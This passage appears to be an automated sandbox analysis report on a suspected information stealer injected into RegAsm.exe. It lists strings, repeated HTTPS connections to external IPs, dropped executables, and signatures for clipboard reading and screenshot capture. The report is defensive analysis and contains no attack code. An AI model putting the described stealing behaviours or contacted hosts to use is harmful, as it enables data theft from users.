Source: FHIDAF.2.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.00000000004DA000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.00000000004DA000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: RegAsm.exe, 0000000C.00000002.2740659135.0000000000D90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ybe.c/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.77.132:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.152.190:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.184.196:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.18.193:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.21.3:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.17.174:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.12:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.77.132:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.152.190:443 -> 192.168.2.4:49787 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.184.196:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.18.193:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.21.3:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.17.174:443 -> 192.168.2.4:49794 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.12:443 -> 192.168.2.4:49798 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.67.133.187:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknown HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.4:49803 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00438660 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 9_2_00438660
Contains functionality to read the clipboard data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00438660 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 9_2_00438660
Contains functionality to record screenshots
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 2_2_00411F55

System Summary
barindex
.NET source code contains very large array initializations
Source: file.exe, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 393216
Source: GDBFCGIIIJ.exe.2.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 360448
Source: 66fbfcc9963ca_ldfsna[1].exe.2.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 360448
Source: KJEGDBKFIJ.exe.2.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 393216
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040145B GetCurrentProcess,NtQueryInformationProcess, 2_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C12ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 2_2_6C12ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C16B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 2_2_6C16B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C16B8C0 rand_s,NtQueryVirtualMemory, 2_2_6C16B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C16B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 2_2_6C16B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C10F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 2_2_6C10F280
Detected potential crypto function
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041C472 2_2_0041C472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0042D933 2_2_0042D933
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0042D1C3 2_2_0042D1C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0042D561 2_2_0042D561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041950A 2_2_0041950A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0042DD1B 2_2_0042DD1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0042CD2E 2_2_0042CD2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041B712 2_2_0041B712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1035A0 2_2_6C1035A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C145C10 2_2_6C145C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C152C10 2_2_6C152C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C17AC00 2_2_6C17AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C17542B 2_2_6C17542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C17545C 2_2_6C17545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C115440 2_2_6C115440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C116C80 2_2_6C116C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1634A0 2_2_6C1634A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C16C4A0 2_2_6C16C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C12D4D0 2_2_6C12D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1164C0 2_2_6C1164C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C146CF0 2_2_6C146CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C10D4E0 2_2_6C10D4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C130512 2_2_6C130512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C12ED10 2_2_6C12ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C11FD00 2_2_6C11FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C140DD0 2_2_6C140DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1685F0 2_2_6C1685F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C147E10 2_2_6C147E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C155600 2_2_6C155600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C169E30 2_2_6C169E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C129E50 2_2_6C129E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C143E50 2_2_6C143E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C124640 2_2_6C124640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C152E4E 2_2_6C152E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C10C670 2_2_6C10C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C176E63 2_2_6C176E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C125E90 2_2_6C125E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C16E680 2_2_6C16E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C164EA0 2_2_6C164EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C10BEF0 2_2_6C10BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C11FEF0 2_2_6C11FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1776E3 2_2_6C1776E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C147710 2_2_6C147710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C119F00 2_2_6C119F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1577A0 2_2_6C1577A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C136FF0 2_2_6C136FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C10DFE0 2_2_6C10DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C117810 2_2_6C117810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C14B820 2_2_6C14B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C154820 2_2_6C154820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C128850 2_2_6C128850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C12D850 2_2_6C12D850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C14F070 2_2_6C14F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1360A0 2_2_6C1360A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1750C7 2_2_6C1750C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C12C0E0 2_2_6C12C0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1458E0 2_2_6C1458E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C12A940 2_2_6C12A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C15B970 2_2_6C15B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C17B170 2_2_6C17B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C11D960 2_2_6C11D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C145190 2_2_6C145190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C162990 2_2_6C162990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C13D9B0 2_2_6C13D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C10C9A0 2_2_6C10C9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C149A60 2_2_6C149A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C17BA90 2_2_6C17BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C11CAB0 2_2_6C11CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C172AB0 2_2_6C172AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1022A0 2_2_6C1022A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C134AA0 2_2_6C134AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C148AC0 2_2_6C148AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C121AF0 2_2_6C121AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C14E2F0 2_2_6C14E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C14D320 2_2_6C14D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C105340 2_2_6C105340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C11C370 2_2_6C11C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C10F380 2_2_6C10F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1753C8 2_2_6C1753C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C28AC30 2_2_6C28AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C276C00 2_2_6C276C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1BAC60 2_2_6C1BAC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1AECC0 2_2_6C1AECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C20ECD0 2_2_6C20ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C338D20 2_2_6C338D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C27ED70 2_2_6C27ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2DAD50 2_2_6C2DAD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1B4DB0 2_2_6C1B4DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C246D90 2_2_6C246D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C33CDC0 2_2_6C33CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C290E20 2_2_6C290E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C24EE70 2_2_6C24EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C236E90 2_2_6C236E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1BAEC0 2_2_6C1BAEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C250EC0 2_2_6C250EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1B6F10 2_2_6C1B6F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2F0F20 2_2_6C2F0F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C272F70 2_2_6C272F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C21EF40 2_2_6C21EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2F8FB0 2_2_6C2F8FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1BEFB0 2_2_6C1BEFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C28EFF0 2_2_6C28EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1B0FE0 2_2_6C1B0FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C200820 2_2_6C200820
